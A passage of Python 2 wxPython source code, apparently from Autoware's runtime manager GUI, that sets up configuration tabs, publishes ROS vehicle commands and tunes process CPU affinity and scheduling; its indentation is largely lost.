self.all_tabs.append(tab)
self.drv_probe_cmd = {}
self.sensing_cmd = {}
self.all_cmd_dics.append(self.sensing_cmd)
dic = self.load_yaml('sensing.yaml')
self.add_params(dic.get('params', []))
self.create_checkboxes(dic, self.panel_sensing, None, self.drv_probe_cmd, self.sensing_cmd, self.OnSensingDriver)
self.setup_buttons(dic.get('buttons', {}), self.sensing_cmd)
#self.timer = wx.Timer(self)
#self.Bind(wx.EVT_TIMER, self.OnProbe, self.timer)
#self.probe_interval = 10*1000
#if self.checkbox_auto_probe.GetValue():
# self.OnProbe(None)
# self.timer.Start(self.probe_interval)
self.dlg_rosbag_record = MyDialogRosbagRecord(self, cmd_dic=self.sensing_cmd)
buttons_color_hdr_setup(self.dlg_rosbag_record)
sense_cmds_dic = dic.get('cmds', {})
#
# for Computing tab
#
tab = self.tab_computing
self.all_tabs.append(tab)
parent = self.tree_ctrl_0.GetParent()
for i in range(2):
self.obj_get('tree_ctrl_' + str(i)).Destroy()
items = self.load_yaml('computing.yaml')
self.add_params(items.get('params', []))
self.sys_gdic = items.get('sys_gui')
self.sys_gdic['update_func'] = self.update_func
self.computing_cmd = {}
self.all_cmd_dics.append(self.computing_cmd)
for i in range(2):
tree_ctrl = self.create_tree(parent, items['subs'][i], None, None, self.computing_cmd)
tree_ctrl.ExpandAll()
tree_ctrl.SetBackgroundColour(wx.NullColour)
setattr(self, 'tree_ctrl_' + str(i), tree_ctrl)
self.Bind(CT.EVT_TREE_ITEM_CHECKED, self.OnTreeChecked)
self.setup_buttons(items.get('buttons', {}), self.computing_cmd)
#
# for Sensing tab (cmds)
#
parent = self.tree_ctrl_sense.GetParent()
self.tree_ctrl_sense.Destroy()
tree_ctrl = self.create_tree(parent, sense_cmds_dic, None, None, self.sensing_cmd)
tree_ctrl.ExpandAll()
tree_ctrl.SetBackgroundColour(wx.NullColour)
self.tree_ctrl_sense = tree_ctrl
#
# for Interface tab
#
tab = self.tab_interface
self.all_tabs.append(tab)
self.interface_cmd = {}
self.all_cmd_dics.append(self.interface_cmd)
self.interface_dic = self.load_yaml('interface.yaml')
self.add_params(self.interface_dic.get('params', []))
self.setup_buttons(self.interface_dic.get('buttons', {}), self.interface_cmd)
self.setup_buttons(self.interface_dic.get('checkboxs', {}), self.interface_cmd)
szr = wx.BoxSizer(wx.VERTICAL)
for cc in self.interface_dic.get('control_check', []):
pdic = {}
prm = self.get_param(cc.get('param'))
for var in prm['vars']:
pdic[ var['name'] ] = var['v']
gdic = self.gdic_get_1st(cc)
panel = ParamPanel(self.panel_interface_cc, frame=self, pdic=pdic, gdic=gdic, prm=prm)
szr.Add(panel, 0, wx.EXPAND)
self.panel_interface_cc.SetSizer(szr)
#
# for Database tab
#
tab = self.tab_database
self.all_tabs.append(tab)
self.data_cmd = {}
self.all_cmd_dics.append(self.data_cmd)
dic = self.load_yaml('data.yaml')
self.add_params(dic.get('params', []))
parent = self.tree_ctrl_data.GetParent()
self.tree_ctrl_data.Destroy()
tree_ctrl = self.create_tree(parent, dic, None, None, self.data_cmd)
tree_ctrl.ExpandAll()
tree_ctrl.SetBackgroundColour(wx.NullColour)
self.tree_ctrl_data = tree_ctrl
#self.setup_config_param_pdic()
if 'buttons' in dic:
self.setup_buttons(dic['buttons'], self.data_cmd)
#
# for Simulation Tab
#
tab = self.tab_simulation
self.all_tabs.append(tab)
self.simulation_cmd = {}
self.all_cmd_dics.append(self.simulation_cmd)
dic = self.load_yaml('simulation.yaml')
self.add_params(dic.get('params', []))
self.setup_buttons(dic.get('buttons'), self.simulation_cmd)
btn = self.button_play_rosbag_play
# setup for rosbag info
gdic = self.obj_to_gdic(btn, {})
gdic_v = dic_getset(gdic, 'file', {})
gdic_v['update_hook'] = self.rosbag_info_hook
tc = self.obj_to_varpanel_tc(btn, 'file')
if tc:
self.rosbag_info_hook( tc.GetValue() )
#vp = self.obj_to_varpanel(btn, 'sim_time')
#self.checkbox_sim_time = vp.obj
#try:
# cmd = ['rosparam', 'get', '/use_sim_time']
# if subprocess.check_output(cmd, stderr=open(os.devnull, 'wb')).strip() == 'true':
# self.checkbox_sim_time.SetValue(True)
#except subprocess.CalledProcessError:
# pass
self.label_rosbag_play_bar.Destroy()
self.label_rosbag_play_bar = BarLabel(tab, ' Playing... ')
self.label_rosbag_play_bar.Enable(False)
#
# for Status tab
#
tab = self.tab_status
self.all_tabs.append(tab)
self.status_cmd = {}
self.all_cmd_dics.append(self.status_cmd)
self.status_dic = self.load_yaml('status.yaml')
self.add_params(self.status_dic.get('params', []))
self.setup_buttons(self.status_dic.get('buttons', {}), self.status_cmd)
font = wx.Font(10, wx.FONTFAMILY_MODERN, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
self.label_top_cmd.SetFont(font)
#
# for Topics tab
#
tab = self.tab_topics
self.all_tabs.append(tab)
#
# for All
#
self.bitmap_logo.Destroy()
bm = scaled_bitmap(wx.Bitmap(rtmgr_src_dir() + 'autoware_logo_1.png'), 0.2)
self.bitmap_logo = wx.StaticBitmap(self, wx.ID_ANY, bm)
rtmgr.MyFrame.__do_layout(self)
cond = lambda s : s.startswith('tab_')
self.tab_names = [ self.name_get_cond(tab, cond=cond, def_ret='').replace('tab_', '', 1) for tab in self.all_tabs ]
new_btn_grps = ( lambda btn_names, tab_names=self.tab_names :
[ [ self.obj_get('button_{}_{}'.format(bn, tn)) for tn in tab_names ] for bn in btn_names ] )
self.alias_grps = new_btn_grps( ('rosbag', 'rviz', 'rqt') )
self.alias_grps += new_btn_grps( ('android_tablet', 'oculus_rift', 'vehicle_gateway', 'auto_pilot'),
('qs', 'interface') )
for grp in self.alias_grps:
wx.CallAfter(self.alias_sync, get_top(grp))
s = get_tooltip_obj(grp[0])
if s:
for obj in grp[1:]:
set_tooltip_str(obj, s)
# Topics tab (need, after layout for sizer)
self.topics_dic = self.load_yaml('topics.yaml')
self.topics_list = []
self.topics_echo_curr_topic = None
self.topics_echo_proc = None
self.topics_echo_thinf = None
self.topics_echo_que = Queue.Queue()
self.topics_echo_sum = 0
thinf = th_start(self.topics_echo_show_th)
self.all_th_infs.append(thinf)
self.refresh_topics_list()
# waypoint
self.route_cmd_waypoint = [ Waypoint(0,0), Waypoint(0,0) ]
rospy.Subscriber('route_cmd', route_cmd, self.route_cmd_callback)
# topic /xxx_stat
self.stat_dic = {}
for k in [ 'gnss', 'pmap', 'vmap', 'lf' ]:
self.stat_dic[k] = False
name = k + '_stat'
rospy.Subscriber(name, std_msgs.msg.Bool, self.stat_callback, callback_args=k)
# top command thread setup
toprc = os.path.expanduser('~/.toprc')
backup = os.path.expanduser('~/.toprc-autoware-backup')
self.toprc_setup(toprc, backup)
cpu_ibls = [ InfoBarLabel(self, 'CPU'+str(i)) for i in range(psutil.NUM_CPUS) ]
sz = sizer_wrap(cpu_ibls, wx.HORIZONTAL, 1, wx.EXPAND, 0)
self.sizer_cpuinfo.Add(sz, 8, wx.ALL | wx.EXPAND, 4)
self.lb_top5 = []
for i in range(5):
lb = wx.StaticText(self, wx.ID_ANY, '')
change_font_point_by_rate(lb, 0.75)
self.lb_top5.append(lb)
line = wx.StaticLine(self, wx.ID_ANY)
ibl = InfoBarLabel(self, 'Memory', bar_orient=wx.HORIZONTAL)
szr = sizer_wrap(self.lb_top5 + [ line, ibl ], flag=wx.EXPAND | wx.FIXED_MINSIZE)
self.sizer_cpuinfo.Add(szr, 2, wx.ALL | wx.EXPAND, 4)
th_arg = { 'setting':self.status_dic.get('top_cmd_setting', {}),
'cpu_ibls':cpu_ibls, 'mem_ibl':ibl,
'toprc':toprc, 'backup':backup }
thinf = th_start(self.top_cmd_th, th_arg)
self.all_th_infs.append(thinf)
# ps command thread
#thinf = th_start(self.ps_cmd_th, { 'interval':5 })
#self.all_th_infs.append(thinf)
# logout thread
interval = self.status_dic.get('gui_update_interval_ms', 100) * 0.001
tc = self.text_ctrl_stdout
thinf = th_start(self.logout_th, { 'que':self.log_que_stdout, 'interval':interval, 'tc':tc } )
self.all_th_infs.append(thinf)
thinf = th_start(self.logout_th, { 'que':self.log_que_stderr, 'interval':interval, 'tc':tc } )
self.all_th_infs.append(thinf)
thinf = th_start(self.logout_th, { 'que':self.log_que, 'interval':interval, 'tc':tc } )
self.all_th_infs.append(thinf)
if interval > 0:
thinf = th_start(self.logshow_th, { 'que':self.log_que_show , 'interval':interval , 'tc':tc })
self.all_th_infs.append(thinf)
else:
self.checkbox_stdout.Enable(False)
tc.Enable(False)
# mkdir
paths = [ os.environ['HOME'] + '/.autoware/data/tf',
os.environ['HOME'] + '/.autoware/data/map/pointcloud_map',
os.environ['HOME'] + '/.autoware/data/map/vector_map' ]
for path in paths:
if not os.path.exists(path):
subprocess.call([ 'mkdir', '-p', path ])
# icon
bm = scaled_bitmap(wx.Bitmap(rtmgr_src_dir() + 'autoware_logo_2_white.png'), 0.5)
icon = wx.EmptyIcon()
icon.CopyFromBitmap(bm)
self.SetIcon(icon)
def __do_layout(self):
pass
def OnClose(self, event):
# kill_all
for proc in self.all_procs[:]: # copy
(_, obj) = self.proc_to_cmd_dic_obj(proc)
self.launch_kill(False, 'dmy', proc, obj=obj)
save_dic = {}
for (name, pdic) in self.load_dic.items():
if pdic and pdic != {}:
prm = self.cfg_dic( {'name':name, 'pdic':pdic} ).get('param', {})
no_saves = prm.get('no_save_vars', [])
pdic = pdic.copy()
for k in pdic.keys():
if k in no_saves:
del pdic[k]
save_dic[name] = pdic
if save_dic != {}:
dir = rtmgr_src_dir()
print('saving param.yaml')
f = open(dir + 'param.yaml', 'w')
s = yaml.dump(save_dic, default_flow_style=False)
#print 'save\n', s # for debug
f.write(s)
f.close()
shutdown_proc_manager()
shutdown_sh = self.get_autoware_dir() + '/ros/shutdown'
if os.path.exists(shutdown_sh):
os.system(shutdown_sh)
for thinf in self.all_th_infs:
th_end(thinf)
self.Destroy()
def RosCb(self, data):
print('recv topic msg : ' + data.data)
r = rospy.Rate(10)
rospy.is_shutdown()
r.sleep()
self.pub.publish(data.data)
r.sleep()
def setup_buttons(self, d, run_dic):
for (k,d2) in d.items():
pfs = [ 'button_', 'checkbox_' ]
obj = next( (self.obj_get(pf+k) for pf in pfs if self.obj_get(pf+k)), None)
if not obj:
s = 'button_' + k
obj = StrValObj(s, False)
setattr(self, s, obj)
if not d2 or type(d2) is not dict:
continue
if 'run' in d2:
run_dic[obj] = (d2['run'], None)
set_tooltip(obj, d2)
gdic = self.gdic_get_1st(d2)
if 'param' in d2:
pdic = self.load_dic_pdic_setup(k, d2)
prm = self.get_param(d2.get('param'))
for var in prm.get('vars'):
name = var.get('name')
if name not in pdic and 'v' in var:
pdic[name] = var.get('v')
for (name, v) in pdic.items():
restore = eval( gdic.get(name, {}).get('restore', 'lambda a : None') )
restore(v)
self.add_cfg_info(obj, obj, k, pdic, gdic, False, prm)
pnls = [ gdic.get(var.get('name'), {}).get('panel') for var in prm.get('vars') ]
for pnl in [ gdic.get('panel') ] + pnls:
if pnl:
self.set_param_panel(obj, eval_if_str(self, pnl))
else:
self.add_cfg_info(obj, obj, k, None, gdic, False, None)
def OnGear(self, event):
grp = { self.button_statchk_d : 1,
self.button_statchk_r : 2,
self.button_statchk_b : 3,
self.button_statchk_n : 4 }
self.radio_action(event, grp.keys())
v = grp.get(event.GetEventObject())
if v is not None:
pub = rospy.Publisher('gear_cmd', gear_cmd, queue_size=10)
pub.publish(gear_cmd(gear=v))
def OnLamp(self, event):
pub = rospy.Publisher('lamp_cmd', lamp_cmd, queue_size=10)
msg = lamp_cmd()
msg.l = self.button_statchk_lamp_l.GetValue()
msg.r = self.button_statchk_lamp_r.GetValue()
pub.publish(msg)
def OnIndi(self, event):
pub = rospy.Publisher('indicator_cmd', indicator_cmd, queue_size=10)
msg = indicator_cmd()
msg.l = self.button_statchk_indi_l.GetValue()
msg.r = self.button_statchk_indi_r.GetValue()
pub.publish(msg)
def OnAutoPilot(self, event):
obj = event.GetEventObject()
self.alias_sync(obj)
v = obj.GetValue()
pub = rospy.Publisher('mode_cmd', mode_cmd, queue_size=10)
pub.publish(mode_cmd(mode=v))
def radio_action(self, event, grp):
push = event.GetEventObject()
for b in grp:
v = b.GetValue()
act = None
act = True if b is push and not v else act
act = False if b is not push and v else act
if act is not None:
set_val(b, act)
def stat_label_off(self, obj):
qs_nms = [ 'map', 'sensing', 'localization', 'detection', 'mission_planning', 'motion_planning' ]
exec_time = self.qs_dic.get('exec_time', {})
gdic = self.obj_to_gdic(obj, {})
msg = std_msgs.msg.Bool(False)
for k in gdic.get('stat_topic', []):
# exec_time off
if next( (dic for dic in exec_time.values() if k in dic), None):
self.exec_time_callback(std_msgs.msg.Float32(0), (k, 'data'))
else:
self.stat_callback(msg, k)
# Quick Start tab, exec_time off
obj_nm = self.name_get(obj)
nm = next( (nm for nm in qs_nms if 'button_' + nm + '_qs' == obj_nm), None)
for key in exec_time.get(nm, {}):
self.exec_time_callback(std_msgs.msg.Float32(0), (key, 'data'))
def route_cmd_callback(self, data):
self.route_cmd_waypoint = data.point
def stat_callback(self, msg, k):
self.stat_dic[k] = msg.data
if k == 'pmap':
v = self.stat_dic.get(k)
wx.CallAfter(self.label_point_cloud.SetLabel, 'OK' if v else '')
if k in [ 'pmap', 'vmap' ]:
v = self.stat_dic.get('pmap') and self.stat_dic.get('vmap')
wx.CallAfter(self.label_map_qs.SetLabel, 'OK' if v else '')
def exec_time_callback(self, msg, (key, attr)):
msec = int(getattr(msg, attr, 0))
exec_time = self.qs_dic.get('exec_time', {})
(nm, dic) = next( ( (nm, dic) for (nm, dic) in exec_time.items() if key in dic), None)
dic[ key ] = msec
lb = self.obj_get('label_' + nm + '_qs')
if lb:
sum = reduce( lambda a,b:a+(b if b else 0), dic.values(), 0 )
wx.CallAfter(lb.SetLabel, str(sum)+' ms' if sum > 0 else '')
# update Status tab
lb = ''
for nm in [ 'map', 'sensing', 'localization', 'detection', 'mission_planning', 'motion_planning' ]:
dic = exec_time.get(nm, {})
sum = reduce( lambda a,b:a+(b if b else 0), dic.values(), 0 )
if sum > 0:
s = nm + ' : ' + str(sum) + ' ms'
lb += s + '\n'
wx.CallAfter(self.label_node_time.SetLabel, lb)
wx.CallAfter(self.label_node_time.GetParent().FitInside)
#
# Setup tab
#
def OnSetupLocalizer(self, event):
obj = self.button_setup_tf
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
self.update_func(pdic, gdic, prm)
#
# Computing Tab
#
def OnTreeMotion(self, event):
tree = event.GetEventObject()
pt = event.GetPosition()
event.Skip()
(item, flags) = tree.HitTest(pt)
if flags & CT.TREE_HITTEST_ONITEMLABEL == 0:
return
text = item.GetData()
if not text:
return
x = item.GetX()
y = item.GetY()
w = item.GetWidth()
h = item.GetHeight()
(x, y) = tree.CalcScrolledPosition(x, y)
iw = tree.GetItemWindow(item)
w -= iw.GetSize()[0] if iw else 0
if not wx.Rect(x, y, w, h).Contains(pt):
return
(x, y) = tree.ClientToScreen((x, y))
self.tip_info = (tree, text, wx.Rect(x, y, w, h))
if getattr(self, 'tip_timer', None) is None:
self.tip_timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.OnTipTimer, self.tip_timer)
self.tip_timer.Start(200, oneShot=True)
def OnTipTimer(self, event):
if getattr(self, 'tip_info', None):
(tree, text, rect) = self.tip_info
(w, h) = self.GetSize()
wx.TipWindow(tree, text, maxLength=w, rectBound=rect)
def OnTreeChecked(self, event):
self.OnChecked_obj(event.GetItem())
def OnChecked_obj(self, obj):
self.OnLaunchKill_obj(obj)
def OnHyperlinked(self, event):
self.OnHyperlinked_obj(event.GetEventObject())
def OnHyperlinked_obj(self, obj):
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
if pdic is None or prm is None:
return
dic_list_push(gdic, 'dialog_type', 'config')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
def obj_to_add_args(self, obj, msg_box=True):
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
if pdic is None or prm is None:
return None
if 'need_camera_info' in gdic.get('flags', []) and msg_box:
ids = self.camera_ids()
if ids:
var = self.get_var(prm, 'camera_id', {})
var['choices'] = ids
dic_list_push(gdic, 'dialog_type', 'sel_cam')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
dlg_ret = show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
if dlg_ret != 0:
return False
else:
pdic['camera_id'] = ''
if 'open_dialog' in gdic.get('flags', []) and msg_box:
dic_list_push(gdic, 'dialog_type', 'open')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
dlg_ret = show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
if dlg_ret != 0:
return False
self.update_func(pdic, gdic, prm)
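		# Build the command-line arguments from each var's 'cmd_param' spec:
		# params flagged 'tail' are moved to the end, hidden/disabled ones are
		# skipped, and each value is rendered with its configured dash/delimiter.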
s = ''
vars = []
for var in prm.get('vars'):
cmd_param = var.get('cmd_param')
if cmd_param:
vars.append(var)
for var in vars[:]: # copy
cmd_param = var.get('cmd_param')
if cmd_param.get('tail'):
vars.remove(var)
vars.append(var)
for var in vars[:]: # copy
name = var.get('name')
flags = gdic.get(name, {}).get('flags', [])
if 'hide' in flags or 'disable' in flags:
vars.remove(var)
for var in vars:
cmd_param = var.get('cmd_param')
name = var.get('name')
v = pdic.get(name)
if (v is None or v == '') and 'default' in cmd_param:
v = cmd_param.get('default')
if dic_eval_if_str(self, cmd_param, 'must') and (v is None or v == ''):
print 'cmd_param', name, 'is required'
if msg_box:
wx.MessageBox('cmd_param ' + name + ' is required')
return False
if dic_eval_if_str(self, cmd_param, 'only_enable') and not v:
continue
if dic_eval_if_str(self, cmd_param, 'only_disable') and v:
continue
name = cmd_param.get('var_name', name)
unpack = cmd_param.get('unpack')
if unpack is not None:
v = ' '.join( v.split(unpack) )
add = ''
dash = cmd_param.get('dash')
if dash is not None:
add += dash + name
delim = cmd_param.get('delim')
if delim is not None:
str_v = str(v)
if var.get('kind') is None:
str_v = adjust_num_str(str_v)
if var.get('kind') == 'path':
str_v = path_expand_cmd(str_v)
str_v = os.path.expandvars(os.path.expanduser(str_v))
relpath_from = var.get('relpath_from')
if relpath_from:
relpath_from = path_expand_cmd(relpath_from)
relpath_from = os.path.expandvars(os.path.expanduser(relpath_from))
str_v = os.path.relpath(str_v, relpath_from)
add += delim + str_v
if add != '':
s += add + ' '
return s.strip(' ').split(' ') if s != '' else None
def obj_to_pdic_gdic_prm(self, obj, sys=False):
info = self.config_dic.get(obj)
if info is None:
sys_prm = self.get_param('sys')
prm_chk = lambda prm : prm is sys_prm if sys else prm is not sys_prm
info = next( ( v for v in self.config_dic.values() if v.get('obj') is obj and prm_chk(v.get('param')) ), None)
if info is None:
return (None, None, None)
pdic = info.get('pdic')
prm = info.get('param')
gdic = info.get('gdic')
return (pdic, gdic, prm)
def obj_to_gdic(self, obj, def_ret=None):
(_, gdic, _) = self.obj_to_pdic_gdic_prm(obj) if obj else (None, None, None)
return gdic if gdic else def_ret
def cfg_obj_dic(self, arg_dic, sys=False, def_ret=(None,{})):
sys_prm = self.get_param('sys')
prm_chk = {
True : (lambda prm : prm is sys_prm),
False : (lambda prm : prm is not sys_prm),
None : (lambda prm : True) }.get(sys)
arg_dic_chk = lambda dic: all( [ dic.get(k) == v for (k,v) in arg_dic.items() ] )
return next( ( (cfg_obj, dic) for (cfg_obj, dic) in self.config_dic.items() \
if arg_dic_chk(dic) and prm_chk(dic.get('param')) ), def_ret)
def cfg_dic(self, arg_dic, sys=False, def_ret={}):
(_, dic) = self.cfg_obj_dic(arg_dic, sys=sys, def_ret=(None, def_ret))
return dic
def cfg_prm_to_obj(self, arg_dic, sys=False):
return self.cfg_dic(arg_dic, sys=sys).get('obj')
def name_to_pdic_gdic_prm(self, name, sys=False):
d = self.cfg_dic( {'name':name}, sys=sys )
return ( d.get('pdic'), d.get('gdic'), d.get('param') )
def update_func(self, pdic, gdic, prm):
pdic_empty = (pdic == {})
for var in prm.get('vars', []):
name = var.get('name')
gdic_v = gdic.get(name, {})
func = gdic_v.get('func')
if func is None and not pdic_empty:
continue
v = var.get('v')
if func is not None:
v = eval(func) if type(func) is str else func()
pdic[ name ] = v
hook = gdic_v.get('update_hook')
if hook:
hook(v)
hook_var = gdic_v.get('hook_var', {})
every_time = 'every_time' in hook_var.get('flags', [])
if var == gdic.get('update_func_arg_var') or every_time:
hook = hook_var.get('hook')
if hook:
hook(hook_var.get('args', {}))
if 'pub' in prm:
self.publish_param_topic(pdic, prm)
self.rosparam_set(pdic, prm)
self.update_depend_enable(pdic, gdic, prm)
d = self.cfg_dic( {'pdic':pdic, 'gdic':gdic, 'param':prm}, sys=True )
self.update_proc_cpu(d.get('obj'), d.get('pdic'), d.get('param'))
def update_proc_cpu(self, obj, pdic=None, prm=None):
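		# Apply the 'sys' settings to the launched process and its children:
		# CPU affinity mask, nice value and, when real_time is set, a FIFO/RR
		# scheduling policy with the configured priority.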
if obj is None or not obj.GetValue():
return
(_, _, proc) = self.obj_to_cmd_dic_cmd_proc(obj)
if proc is None:
return
if pdic is None or prm is None:
(pdic, _, prm) = self.obj_to_pdic_gdic_prm(obj, sys=True)
cpu_chks = self.param_value_get(pdic, prm, 'cpu_chks')
cpu_chks = cpu_chks if cpu_chks else [ True for i in range(psutil.NUM_CPUS) ]
cpus = [ i for i in range(psutil.NUM_CPUS) if cpu_chks[i] ]
nice = self.param_value_get(pdic, prm, 'nice', 0)
d = { 'OTHER':SCHED_OTHER, 'FIFO':SCHED_FIFO, 'RR':SCHED_RR }
policy = SCHED_OTHER
priority = 0
if self.param_value_get(pdic, prm, 'real_time', False):
policy = d.get(self.param_value_get(pdic, prm, 'policy', 'FIFO'), SCHED_FIFO)
priority = self.param_value_get(pdic, prm, 'prio', 0)
procs = [ proc ] + proc.get_children(recursive=True)
for proc in procs:
print 'pid={}'.format(proc.pid)
if proc.get_nice() != nice:
print 'nice {} -> {}'.format(proc.get_nice(), nice)
if set_process_nice(proc, nice) is False:
print 'Err set_process_nice()'
if proc.get_cpu_affinity() != cpus:
print 'cpus {} -> {}'.format(proc.get_cpu_affinity(), cpus)
if set_process_cpu_affinity(proc, cpus) is False:
print 'Err set_process_cpu_affinity()'
policy_str = next( (k for (k,v) in d.items() if v == policy), '?')
print 'sched policy={} prio={}'.format(policy_str, priority)
if set_scheduling_policy(proc, policy, priority) is False:
print 'Err scheduling_policy()'
def param_value_get(self, pdic, prm, name, def_ret=None):
def_ret = self.param_default_value_get(prm, name, def_ret)
return pdic.get(name, def_ret) if pdic else def_ret
def param_default_value_get(self, prm, name, def_ret=None):
return next( (var.get('v') for var in prm.get('vars') if var.get('name') == name ), def_ret) \
if prm else def_ret
def update_depend_enable(self, pdic, gdic, prm):
for var in prm.get('vars', []):
name = var.get('name')
gdic_v = gdic.get(name, {})
depend = gdic_v.get('depend')
if depend is None:
continue
vp = gdic_v.get('var')
if vp is None:
continue
v = pdic.get(depend)
if v is None:
continue
depend_bool = eval( gdic_v.get('depend_bool', 'lambda v : bool(v)') )
v = depend_bool(v)
enables_set(vp, 'depend', v)
def publish_param_topic(self, pdic, prm):
pub = prm['pub']
klass_msg = globals()[ prm['msg'] ]
msg = klass_msg()
for (name, v) in pdic.items():
if prm.get('topic') == '/twist_cmd' and name == 'twist.angular.z':
v = -v
(obj, attr) = msg_path_to_obj_attr(msg, name)
if obj and attr in obj.__slots__:
type_str = obj._slot_types[ obj.__slots__.index(attr) ]
setattr(obj, attr, str_to_rosval(v, type_str, v))
if 'stamp' in prm.get('flags', []):
(obj, attr) = msg_path_to_obj_attr(msg, 'header.stamp')
setattr(obj, attr, rospy.get_rostime())
pub.publish(msg)
def rosparam_set(self, pdic, prm):
rosparams = None
for var in prm.get('vars', []):
name = var['name']
if 'rosparam' not in var or name not in pdic:
continue
rosparam = var['rosparam']
v = pdic.get(name)
v = str(v)
cvdic = { 'True':'true', 'False':'false' }
if v in cvdic:
v = cvdic.get(v)
if rosparams is None:
cmd = [ 'rosparam', 'list' ]
rosparams = subprocess.check_output(cmd).strip().split('\n')
nm = rosparam
nm = ('/' if len(nm) > 0 and nm[0] != '/' else '') + nm
exist = nm in rosparams
if exist:
cmd = [ 'rosparam', 'get', rosparam ]
ov = subprocess.check_output(cmd).strip()
if ov == v:
continue
elif v == '':
continue
cmd = [ 'rosparam', 'set', rosparam, v ] if v != '' else [ 'rosparam', 'delete', rosparam ]
print(cmd)
subprocess.call(cmd)
#
# Sensing Tab
#
def OnSensingDriver(self, event):
self.OnChecked_obj(event.GetEventObject())
def OnRosbagRecord(self, event):
self.dlg_rosbag_record.Show()
obj = event.GetEventObject()
set_val(obj, False)
def create_checkboxes(self, dic, panel, sizer, probe_dic, run_dic, bind_handler):
if 'name' not in dic:
return
obj = None
bdr_flg = wx.ALL
if 'subs' in dic:
lst = []
for d in dic['subs']:
self.create_checkboxes(d, panel, lst, probe_dic, run_dic, bind_handler)
if dic['name']:
obj = static_box_sizer(panel, dic.get('name'))
set_tooltip(obj.GetStaticBox(), dic)
else:
obj = wx.BoxSizer(wx.VERTICAL)
for (o, flg) in lst:
obj.Add(o, 0, wx.EXPAND | flg, 4)
else:
obj = wx.CheckBox(panel, wx.ID_ANY, dic['name'])
set_tooltip(obj, dic)
self.Bind(wx.EVT_CHECKBOX, bind_handler, obj)
bdr_flg = wx.LEFT | wx.RIGHT
if 'probe' in dic:
probe_dic[obj] = (dic['probe'], None)
if 'run' in dic:
run_dic[obj] = (dic['run'], None)
if 'param' in dic:
obj = self.add_config_link(dic, panel, obj)
else:
gdic = self.gdic_get_1st(dic)
self.add_cfg_info(obj, obj, dic.get('name'), None, gdic, False, None)
if sizer is not None:
sizer.append((obj, bdr_flg))
else:
panel.SetSizer(obj)
def add_config_link(self, dic, panel, obj):
cfg_obj = wx.HyperlinkCtrl(panel, wx.ID_ANY, '[config]', '')
fix_link_color(cfg_obj)
self.Bind(wx.EVT_HYPERLINK, self.OnConfig, cfg_obj)
add_objs = (obj, wx.StaticText(panel, wx.ID_ANY, ' '), cfg_obj)
hszr = sizer_wrap(add_objs, wx.HORIZONTAL)
name = dic['name']
pdic = self.load_dic_pdic_setup(name, dic)
gdic = self.gdic_get_1st(dic)
prm = self.get_param(dic.get('param'))
self.add_cfg_info(cfg_obj, obj, name, pdic, gdic, True, prm)
return hszr
def camera_ids(self):
if self.button_synchronization.GetValue():
return []
cmd = "rostopic list | sed -n 's|/image_raw||p' | sed s/^$//"
return subprocess.check_output(cmd, shell=True).strip().split()
def cam_id_to_obj(self, cam_id, v):
cam_id_obj = self.cfg_prm_to_obj( {'name':cam_id} )
if cam_id_obj is None:
cam_id_obj = StrValObj(cam_id, v)
cam_id_obj.SetValue(v)
return cam_id_obj
def camera_id_hook(self, args):
new_id = args.get('pdic', {}).get('camera_id', '')
ids = args.get('ids', [])
if new_id not in ids:
return
idx = ids.index(new_id)
pp = args.get('param_panel')
if pp:
pp.detach_func()
dlg = args.get('dlg')
if dlg:
dlg.EndModal(idx + 100)
def OnCalibrationPublisher(self, event):
obj = event.GetEventObject()
(_, gdic_org, prm) = self.obj_to_pdic_gdic_prm(obj)
if obj.GetValue():
gdic_org['ids'] = self.camera_ids()
ids = gdic_org.get('ids', [])
if ids == []:
self.OnLaunchKill(event)
return
#
# setup
#
(cmd_dic, cmd, _) = self.obj_to_cmd_dic_cmd_proc(obj)
flags = gdic_org.get('flags', [])[:] # copy
if 'open_dialog' in flags:
flags.remove('open_dialog')
pdic_baks = {}
for cam_id in ids:
(pdic_a, gdic_a, _) = self.name_to_pdic_gdic_prm(cam_id)
pdic = pdic_a if pdic_a else self.load_dic_pdic_setup(cam_id, {})
pdic_baks[cam_id] = pdic.copy()
gdic = gdic_a if gdic_a else gdic_org.copy()
gdic['flags'] = flags
cam_id_obj = self.cam_id_to_obj(cam_id, obj.GetValue())
if not pdic_a or not gdic_a:
self.add_cfg_info(cam_id_obj, cam_id_obj, cam_id, pdic, gdic, False, prm)
if not cam_id_obj in cmd_dic:
cmd_dic[ cam_id_obj ] = (cmd, None)
var = self.get_var(prm, 'camera_id', {})
var['choices'] = ids
#
# Dialog
#
cam_id = ids[0]
while obj.GetValue():
(pdic, gdic, _) = self.name_to_pdic_gdic_prm(cam_id)
pdic['camera_id'] = cam_id
dic_list_push(gdic, 'dialog_type', 'open2')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
gdic_v = dic_getset(gdic, 'camera_id', {})
args = { 'pdic':pdic, 'ids':ids, 'param_panel':gdic.get('param_panel'), 'dlg':dlg }
gdic_v['hook_var'] = { 'hook':self.camera_id_hook, 'args':args }
dlg_ret = show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
pdic['camera_id'] = cam_id # restore
if dlg_ret == 0: # OK
break
idx = dlg_ret - 100
if idx < 0 or len(ids) <= idx: # Cancel
for cam_id in ids:
(pdic, _, _) = self.name_to_pdic_gdic_prm(cam_id)
pdic.update(pdic_baks.get(cam_id))
set_val(obj, False)
return
# Menu changed
cam_id = ids[idx]
#
# Launch / Kill
#
for cam_id in ids:
cam_id_obj = self.cfg_prm_to_obj( {'name':cam_id} )
(pdic, _, _) = self.obj_to_pdic_gdic_prm(cam_id_obj)
pdic['solo_camera'] = False
#print '@', cam_id, cam_id_obj.GetValue()
